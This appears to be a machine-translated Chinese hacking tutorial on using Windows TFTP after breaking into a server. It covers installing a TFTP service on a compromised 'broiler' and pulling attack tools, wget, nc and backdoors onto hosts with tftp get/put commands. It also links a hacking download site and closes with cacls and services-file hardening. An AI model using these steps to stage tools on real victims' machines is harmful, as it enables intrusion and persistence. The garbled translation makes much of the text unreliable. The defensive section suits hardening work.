TFTP installation use full contact
The rookie A is a shell with a surrounding WebDAV vulnerability, but after adding the administrator account, he finds that it is not possible to establish an administrator account, but can not be connected to the connection, and IPC $ under the cmd, Tip Startup error. So how do you upload a file? The rookie can listen to people can use FTP, but because FTPs in the CMD environment cannot be interacting, so that the cmd stops there after entering the FTP? The rookie is stupid; some people say that it is written with the echo command to download a file from the specified FTP download, and then download it via the ftp -s: file command, this is feasible through practice, but the rookie feels a bit trouble. How to do?
At this time, a sound rang in the ear: use TFTP, give you happiness. TFTP? ! @ # $ ^ & *, The rookie thought for a while, you can't understand. Have you heard of FTP, what is TFTP? So today I will give the rookie to its installation and use process and the role of intrusion and their own experience.
I. Introduction to TFTP:
TFTP is a brief referred to as the Trivial File Transfer Protocol, translated as a simple file transfer protocol, which is a protocol used in the TCP / IP protocol to make simple file transfer between clients and servers, although the function is a bit small, but in us The invasion is still very big.
TFTP and Win2K self-contained FTP server and current popular Serv-U are TFTP is bearer in UDP port; the size of TFTP is small compared to FTP; defect is that the data streaming service it provides is not *, It does not provide access authorization and authentication mechanism, using timeout retransmission mode to ensure the arrival of data, use UDP 69 ports. However, because it is UDP port, it is easy to get rid of the firewall's limit and IP security strategy to the port audit. You can use flexible use when invading, this is what I introduce it to you.
Second: TFTP service is opened:
Maybe you still remember the classic Unicode vulnerability, using this vulnerability to execute the command in the browser, you can upload IDQ.dll via TFTP, then combine ISPC.exe to get administrator privileges. But you know that the TFTP server is not easy to find, but the words come back, since tftp.exe is a more cute gadget of Microsoft, then we can use it to do something, open TFTP services for broilers If you don't have to find a TFTP server. We can find TFTP.exe under Win2K Winnt / System32, and you can find TFTP.exe under WinNT / System32 / DLLCache. Of course, you can enter: DIR% windir% / TFTP * / s (indicating that the TFTP prefix program in% windir% directory) is displayed in the command line. The information of my machine feedback is this:
The volume in the drive C does not have a label. The serial number of the volume is 287C-D610
C: / winnt / system32 directory
2002-07-22 12:05 17,680 TFTP.exe
1 file 17,680 bytes
C: / Winnt / System32 / DLLCache directory
2002-07-22 12:05 17,680 TFTP.exe
2001-08-22 08:00 19,728 TFTPD.EXE
2 files 37,408 bytes
Everyone also saw it, there is a TFTPD.exe program, not wrong, it is a service server for the TFTP server. How to open the TFTP service of broiler, double click to run? -Install? Here we need a tool in resourcekit install the TFTP to the service, INSTSRV is the tool in the command line, and srvinstw.exe is its GUI version, look at Figure 1: Let's see it:
C: / longker> INSTSRV.EXE
Installs and Removes System Services from NT
Instsrv
Install Service Example:
INSTSRV MyService C: /Mydir/diskService.exe
-Or-
INSTSRV MyService C: /mailsrv/mailsrv.exe -a mydomain / joebob -p foo
REMOVE service Example:
INSTSRV MyService REMOVE
Then let's install TFTP as a service:
C: / longker> Instsrv "TFTP SERVICES" C: /WINNT/System32/dllcache/tftpd.exe
The Service Was SuccessFuly Added!
Make Sure That You Go Into The Control Panel and Use
The Services Applet To change the account name and
Password That this Newly Installed Service Will Use
For ITS Security Context.
In this way, we installed the TFTP service. The service name is TFTP Services, let's start it:
C: / longker> Net Start "TFTP SERVICES"
The TFTP Services service is starting.
The TFTP Services service has been successfully launched.
OK, the service has been successfully launched, we can use fport to view the case where the port is turned on:
1524 TFTPD -> 69 udp c: /winnt/system32/dllcache/tftpd.exe
When I saw it, it used the UDP protocol to perform file transfer, the open port is 69.
Or we can query with the following command:
C: / longker> NetStat -an | Find "69"
NetStat -an | Find "69"
UDP 202.xx.xx.165: 69 *: *
After the service is successful, the TFTPDROOT folder is generated in the system with the directory, and we upload and provide the downloaded files are placed here.
Here is a very good TFTP server to recommend it to everyone, there is a logging and directory setting function, and it also shows the transfer progress. The most important thing is that it is free, and you can use multiple platforms.
Download address http://5ihack.vicp.net:88/down/show.asp?id=219
Three: How to use TFTP:
TFTP self-contained help information:
TFTP [-i] host [get | put] source [destination]
-i specifies binary image transfert (also caledoct). in binary image mode the file is moved
iprally, byte by byte. Use this mode...........
Host Specifies The Local or Remote Host.
Get Transfers The File Destination on The Remote Host To
The File Source on the local host.
Put Transfers The File Source on The Local Host To
The File Destination on The Remote Host.
Source Specifies the File to Transfer.
Destination Specifies Where to Transfer the File.
Description:
The -i option is to transfer files in binary mode, and many of the Exploit code requires this mode to be transmitted.
Host is the host that opens the TFTP service, which can be a local host or a remote host.
GET is downloaded in the currently running directory, and PUT is uploaded to the machine that opens the TFTP service. Source is the name of the file you want to upload or download.
Let's take a few list:
C: / longker> TFTP -I 202.xx.xx.165 get sc.exe
TFTP -I 202.XX.XX.165 Get SC.EXE
Transfer Successful: 63248 bytes in 1 second, 63248 bytes / s
This is a host from the host that opens the TFTP service, the speed is good :)
C: / longker> TFTP -I 202.xx.xx.165 Put sc.exe
TFTP -I 202.xx.xx.165 Put sc.exe
Transfer Successful: 63248 bytes in 1 second, 63248 bytes / s
The above is to upload sc.exe to the TFTP server.
Four: Related questions:
Since TFTP is self-contained, we can use it to upload the tool we have to use without downloading other tools. So just the problem of rookie, we can download the tools we need with TFTP, or download wget.exe with TFTP (a small tool that can download programs from the web server), then use wget to download your own implementation ready Toolkit.
The previous problem is solved, but the rookie will also encounter some problems. For example, when you want to delete uploaded files, there is an error message: refuse to access! what happened? The documents I uploaded myself can't be deleted, too fake. That's because the file uploaded by TFTP is default to read-only properties, so we need to use Attrib -r to remove its read-only properties before deleting.
Everyone also knows that many online worms or hacker attacks have tried to get the runtime running permission through a vulnerability, and the worms are often the TFTP client program comes with the TFTP client program with Windows to get some needs. Program or rear door programs such as tools such as NC. Newcomer, such as the hot ASP Trojan, can also use cmd.asp to call TFTP to download tools, and then get system administrator privileges. Readers who pay attention to safety may ask, where there is a case that my machine is also invaded, how is it to prevent invaders from using TFTP? I introduced two ways to everyone here.
1: You can use CACLS to limit users' access to the program.
C: /> CACLS
Display or modify file access control tables (ACL)
Cacls filename [/ t] [/ e] [/ c] [/ g user: perm] [/ r user [...]]
[/ P User: perm [...]] [/ d user [...]]
FileName shows the ACL.
/ T Change the ACL of the current directory and the specified file in all the subdirectories.
/ E Edit the ACL without replacing.
/ C Continue when a refusal access error occurs.
/ G user: perm gives the specified user access.
Perm can be: r Read W Write C Change (Writing) F Complete Control
/ R User revoked the user's access (justice only when used with / e).
/ P User: Perm replaces the specified user's access.
Perm can be: N without R reading W Write C change (write) F full control
/ D User refuses to specify the user's access.
You can specify multiple files using wildcards in the command. You can also specify multiple users in the command.
The associated help information is as above, then we can prohibit IUSR_Computername users from running permission to TFTP.exe.
C: /> CaCls C: /Winnt/System32/TFTP.EXE / D IUSR_CompUtername
C: /> CaCls C: /Winnt/System32/dllcache/tftp.exe / D iUSR_Computername
Is it sure (Y / N)? Y
Processing files: c: /winnt/system32/tftp.exe
Processing file: c: /winnt/system32/dllcache/tftp.exe
C: /> TFTP
access denied.
Obviously we have achieved our goal. Similar to we can prohibit IUSR users from calling cmd.exe.
2: Can we delete TFTP to have a nepon? No, because the system key program such as TFTP.exe is protected by the Windows File Protection system under Win2k and cannot be changed. Here we introduce another method,
Use the text editing tool to open% systemroot% / system32 / drivers / etc to find the corresponding TFTP that line:
Bootps 67 / UDP DHCPS #bootstrap Protocol Server
Bootpc 68 / udp dhcpc #bootstrap Protocol Client
TFTP 69 / UDP #Trivial File Transfer
Replace 69 / UDP into 0 / UDP Save Exit. Let's try to see if you can use TFTP?
How, Tips "Timeout Occurred, also reached our purpose.
